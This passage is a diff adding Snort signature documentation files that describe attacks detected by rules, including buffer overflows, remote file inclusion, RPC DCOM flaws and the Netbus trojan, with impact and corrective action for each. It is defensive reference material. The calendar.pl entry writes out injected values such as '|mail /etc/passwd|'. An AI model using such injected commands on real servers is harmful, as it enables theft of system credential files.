+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3115.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3115
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000384.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000384
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ottoman" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "default_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "default_path" parameter in the "index.php" script used by the "Ottoman" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ottoman
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1626.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid: 1626
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+The attacker may also be trying to gain administrator access to the 
+host, garner information on users of the system or retrieve sensitive 
+customer information.
+
+Some applications may store sensitive information such as database 
+connections, user information, passwords and customer information in 
+files accessible via a web interface. Care should be taken to ensure 
+these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/144.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+144
+
+--
+Summary:
+This event is generated when an FTP login by user "w0rm" was attempted. 
+This is an account used by the ADMw0rm-v1 worm.
+
+--
+Impact:
+Infected systems are left with a backdoor user account named 
+"w0rm" and an email with the victims ip address is emailed to the worms 
+creators.
+
+--
+Detailed Information:
+This worm exploits a vulnerability in BIND version 4.9.6 and is linux 
+specific. These attempts mean the box has probably already been 
+compromised.
+
+--
+Affected Systems:
+	Default installations of RedHat 4.0 to 5.2
+
+--
+Attack Scenarios:
+Standard Internet worm.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade BIND on vulnerable servers.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS01
+
+--
--- /dev/null
+++ b/doc/signatures/100000432.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000432
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "file.php" using a remote file being passed as the "APP[path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][core]" parameter in the "file.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/111.txt
@@ -0,0 +1,78 @@
+
+--
+Rule:
+--
+Sid:111
+
+--
+Summary:
+This event is generated when an attacker is connected to a Netbus trojan
+and issues the command 'getinfo'
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+The Netbus program is a backdoor designed for Windows. It allows anyone 
+who knows the listening port number and password to remotely control the
+host.  Intruders access the server using either a text or graphics based
+client. 
+
+The backdoor program allows the remote user to execute commands, list
+files, start silent services, share directories, upload and download
+files, manipulate the registry, kill processes, list processes, as well
+as other options, as well as open/close the CD-ROM drive, send
+interactive dialogs to chat with the compromised system, listen to the
+system's microphone (if it has one), and a few other features. 
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows NT
+	Windows 2000
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+Security tool probing for netbus
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access to port 12345 from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by John Liss
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+NTsecurity.net
+http://www.ntsecurity.net/
+
+--
--- /dev/null
+++ b/doc/signatures/1184.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1184
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2108.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2108
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command CAPA.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by
+sending multiple line feed characters to a POP server via the CAPA command.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ZVON RFC Reference:
+http://www.zvon.org/tmRFC/RFC2449/Output/chapter5.html
+
+Gordano Knowledge Base:
+http://www.ntmail.co.uk/kb.htm?q=981
+
+ZVON RFC Reference:
+http://www.zvon.org/tmRFC/RFC2449/Output/chapter6.html
+
+--
--- /dev/null
+++ b/doc/signatures/2300.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2300
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1910.txt
@@ -0,0 +1,70 @@
+Rule:
+
+Sid:
+1909
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) Calendar
+Manager Service daemon, cmsd.
+
+--
+Impact:
+Remote root access. The attack may allow execution of arbitrary commands
+with the privileges of root.
+
+--
+Detailed Information:
+The cmsd RPC service implements the Calendar Manager Service daemon that
+is often distributed with the Common Desktop Environment (CDE) and Open
+Windows. The Calendar Manager daemon provides appointment and scheduling
+functions for CDE. A buffer overflow exists in the rtable_insert()
+function because of improper bounds checking, allowing the execution of
+arbitrary commands with the privileges of root.  One possible exploit
+vector is by inserting appointments into the Calendar Manager database.
+ 
+--
+Affected Systems:
+	SCO Open UNIX 8.0
+	SCO UnixWare 7.1.1
+	HP-UX 10.20, 10.24, 10.30, 11.0
+	Sun Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, 7.0
+	Sun SunOS 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+The attacker can use the exploit code to overflow the buffer allowing
+execution of arbitrary commands with the privileges of root.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2516.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2516
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/414.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+414
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP IPV6 Where-Are-You datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Type 33 datagrams are not expected network traffic.  Hosts generating ICMP Type 33 datagrams should be investigated for hostile activity.
+
+--
+
+Detailed Information:
+ICMP Type 33 is an undocumented extension to RFC 1812 and RFC 792.  Its current use it not defined by an approved RFC.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Hosts generating ICMP Type 33 datagrams should be investigated for hostile activity.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000551.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+100000551
+--
+Summary:
+This event is generated when an attempt is made to access the file 
+"aolbonics.php which contains known vulnerabilities in the "Project Eros 
+BBSEngine" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known 
+vulnerabilities from a remote machine used by the "Project Eros BBSEngine" 
+application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Project Eros BBSEngine
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1340.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1340
+
+--
+Summary:
+Attempted tfp command access via web
+
+--
+Impact:
+Possible attempt to gain information using the Trivial File Transfer
+Protocol (tfp) to  access sensitive files on a webserver. It is also
+possible that an  attempt is being made to remotely boot or reboot a
+device using  tfp.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence from sensitive system files on a
+webserver.  Tftp is a variation of the File Transfer Protocol that can
+be used to  transfer files from one host to another, one feature it has
+is that it  can be used to boot or reboot various network devices
+without authentication  being needed. The attacker could possibly gain
+information needed  for other attacks on the system, including the
+retrieval of password  files.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'tfp' in the
+URI which can  then return requested files to an external server.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside  of it's designated web root or cgi-bin. This command may also
+be requested  on a command line should the attacker gain access to the
+machine.  Non-essential binaries should be removed from a webserver once
+it is in  production.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-1990-02.html
+
+--
--- /dev/null
+++ b/doc/signatures/2435.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2435
+
+--
+Summary:
+This event is generated when an attempt is made to access a file type
+that may be subject to a known vulnerability in Microsoft Windows Explorer.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+When processing Windows Extended Metafile Format (.emf) files, Windows
+Explorer sets a buffer size based on information in the header for the
+file. If a malformed header is sent, it may be possible for an attacker
+to cause a DoS condition to occur. It may also be possible for an
+attacker to execute code of their choosing on a vulnerable host.
+
+This issue may also affect Microsoft Windows Metafile Format (.wmf)
+files also.
+
+--
+Affected Systems:
+	Microsoft Windows XP Home, Professional and Media Center Edition
+	Microsoft Windows XP Home and Professional SP-1
+
+--
+Attack Scenarios:
+An attacker might supply a specially crafted request for such a file
+that might cause the error condiion to occur.
+
+--
+Ease of Attack:
+Moderate/Difficult
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3413.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3413
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3438.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3438
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1455.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+1455
+
+--
+Summary: 
+This event is generated when an attempt is made to access a web 
+application that may lead to exploitation of the application.
+
+--
+Impact: 
+Potentially harmful execution of binaries through perl open()
+
+--
+Detailed Information: 
+An open source calendar perl script by Matt Kruse, Allows commands to be
+executed without input verification using the perl open() function. ie
+/cgi-bin/calendar.pl place the string "|ping 127.0.0.1|" in the
+configuration file field, this executes the command "ping 127.0.0.1" 
+
+--
+Affected Systems:
+	Matt Kruse Calendar Script version 2.2.
+
+--
+Attack Scenarios: 
+An unauthenticated user can execute arbitrary programs on the server by
+accessing calendar.pl and inputting commands such as "|mail
+/etc/passwd|" into the configuration file field.
+
+--
+Ease of Attack: 
+Simple. No exploit software required.
+
+--
+False Positives: 
+If your webserver has pages by the name of calendar.pl this rule will
+fire often. Many sites now use calendar applications and this rule may 
+generate a large number of false positives, it does not distinguish 
+between perl cgi applications and php scripts. Consider tuning this rule
+for your site if it is generating a large number of false positives. If 
+you use a calendar application, consider changing the name of the script
+to something other than "calendar.pl".
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+Download a newer version of the cgi 
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Snort documentation contributed by Aaron Navratil (Initial Research)
+Snort documentation contributed by Josh Gray (Edits)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://online.securityfocus.com/bid/1215
+
+--
--- /dev/null
+++ b/doc/signatures/928.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+928
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2129.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2129
+
+
+--
+Summary:
+This event is generated when an attempt is made to access nsiislog.dll on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Possible buffer overrun leading to arbitrary code execution.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access nsiislog.dll on a host running Microsoft Internet Information Server (IIS).
+
+The attacker may be trying to overflow a buffer using nsiislog.dll. This can present the attacker with the opportunity to execute arbitrary code of his choice on the vulnerable system. The vulnerability occurs when requests for Server Side Includes are not properly checked by the web server.
+
+--
+Affected Systems:
+Any host using IIS 5.0.
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer and then proceed to execute arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Technet:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-018.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2676.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2676
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_instantiation
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1064.txt
